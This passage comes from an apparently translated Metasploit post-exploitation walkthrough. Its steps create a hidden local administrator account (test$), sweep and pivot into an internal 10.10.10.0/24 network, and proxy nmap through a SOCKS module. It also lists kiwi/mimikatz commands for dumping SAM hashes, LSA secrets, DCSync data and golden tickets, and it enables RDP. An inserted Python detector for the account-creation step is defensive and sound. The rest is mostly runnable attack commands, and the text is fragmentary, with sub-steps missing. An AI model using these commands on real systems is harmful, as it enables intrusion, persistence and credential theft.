meterpreter > shell
C:\Windows\system32>net user test$ 123456 /add & net localgroup administrators test$ /add
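As an added defensive example (not part of the original write-up), the account step above leaves a distinctive trace in process-creation telemetry: a `net user <name> <password> /add` followed by `net localgroup administrators <name> /add` on the same host, and a name ending in `$` (like `test$`) is omitted from plain `net user` listings. The detector below runs over constructed, simplified log lines in an assumed `<time> <host> <command line>` format and pairs each account creation with its later Administrators membership, including the single-line `&` form used on this page.

```python
import re
from datetime import datetime

# Constructed sample telemetry, simplified to "<time> <host> <command line>" (assumed format).
SAMPLE_LOG = """\
2024-01-01T10:00:01 WIN2008 whoami
2024-01-01T10:00:05 WIN2008 cmd.exe /c net user test$ 123456 /add & net localgroup administrators test$ /add
2024-01-01T10:03:00 FILESRV net user alice P@ssw0rd /add
2024-01-01T11:00:00 FILESRV net localgroup administrators alice /add
2024-01-01T12:00:00 DC01 net user
"""

# "net user <name> <password> /add" (net.exe hands the work to net1.exe, so match both)
USER_ADD = re.compile(r"\bnet1?(?:\.exe)?\s+user\s+(\S+)\s+\S+\s+/add\b", re.I)
# "net localgroup administrators <name> /add"
GROUP_ADD = re.compile(r"\bnet1?(?:\.exe)?\s+localgroup\s+administrators\s+(\S+)\s+/add\b", re.I)


def is_hidden_name(account):
    """Names ending in '$' do not show up in a plain 'net user' listing, like test$ above."""
    return account.endswith("$")


def parse_line(line):
    """Split one constructed log line into (timestamp, host, command line)."""
    time_str, host, cmd = line.split(" ", 2)
    return datetime.fromisoformat(time_str), host, cmd


def detect_local_admin_creation(log_text):
    """Pair each 'net user ... /add' with a later (or same-line) 'net localgroup
    administrators ... /add' for the same account on the same host.
    Returns a list of (host, account, hidden_name, seconds_between_create_and_admin)."""
    created = {}  # (host, account) -> creation timestamp
    findings = []
    for raw in log_text.splitlines():
        if not raw.strip():
            continue
        ts, host, cmd = parse_line(raw)
        m = USER_ADD.search(cmd)
        if m:
            created[(host, m.group(1).lower())] = ts
        m = GROUP_ADD.search(cmd)  # checked separately so "a & b" on one line is caught
        if m:
            key = (host, m.group(1).lower())
            if key in created:
                elapsed = int((ts - created[key]).total_seconds())
                findings.append((host, m.group(1), is_hidden_name(m.group(1)), elapsed))
    return findings


if __name__ == "__main__":
    for host, account, hidden, secs in detect_local_admin_creation(SAMPLE_LOG):
        print(f"{host}: new local admin {account!r} (hidden name={hidden}) after {secs}s")
```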
7. Scan for live hosts on the internal network
meterpreter> info post/multi/gather/ping_sweep
meterpreter> run post/multi/gather/ping_sweep rhosts=10.10.10.1-10.10.10.5
meterpreter> run post/multi/gather/ping_sweep rhosts=10.10.10.0/24
This module tries to ping the hosts on the internal network; if a reply comes back, the host is alive.
meterpreter> info post/windows/gather/arp_scanner
meterpreter> run post/windows/gather/arp_scanner rhosts=10.10.10.1-10.10.10.5
meterpreter> run post/windows/gather/arp_scanner rhosts=10.10.10.0/24
This module sends ARP requests; if a reply comes back, the host is alive.
8. Add a route to the internal network
meterpreter> run autoroute -s 10.10.10.0/24
meterpreter> run autoroute -p
or
meterpreter> run post/multi/manage/autoroute
9. Scan the open ports of internal hosts
Use nmap through the MSF SOCKS proxy module to scan the open ports of internal hosts.
(1) Configure the SOCKS proxy
meterpreter> background
msf6 exploit(multi/handler) > use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > set srvhost 192.168.1.8    (the Win2008 IP)
msf6 auxiliary(server/socks_proxy) > exploit -j
Command                Description
-------                -----------
creds_all              Retrieve all credentials (parsed)
creds_kerberos         Retrieve Kerberos creds (parsed)
creds_livessp          Retrieve Live SSP creds
creds_msv              Retrieve LM/NTLM creds (parsed)
creds_ssp              Retrieve SSP creds
creds_tspkg            Retrieve TsPkg creds (parsed)
creds_wdigest          Retrieve WDigest creds (parsed)
dcsync                 Retrieve user account information via DCSync (unparsed)
dcsync_ntlm            Retrieve user account NTLM hash, SID and RID via DCSync
golden_ticket_create   Create a golden kerberos ticket
kerberos_ticket_list   List all kerberos tickets (unparsed)
kerberos_ticket_purge  Purge any in-use kerberos tickets
kerberos_ticket_use    Use a kerberos ticket
kiwi_cmd               Execute an arbitary mimikatz command (unparsed)
lsa_dump_sam           Dump LSA SAM (unparsed)        (view the target system's SAM dump)
lsa_dump_secrets       Dump LSA secrets (unparsed)    (view the target system's passwords)
password_change        Change the password/hash of a user
wifi_list              List wifi profiles/creds for the current user
wifi_list_shared       List shared wifi profiles/creds (requires SYSTEM)
The plaintext password 123456 is visible (if no plaintext is present, brute-forcing the hash can be attempted).
(4) Enable Remote Desktop
Usage: run getgui -u <username> -p <password>
Or:    run getgui -e
OPTIONS:
    -e        Enable RDP only.
    -f <opt>  Forward RDP Connection.
    -h        Help menu.
    -p <opt>  The Password of the user to add.
    -u <opt>  The Username of the user to add.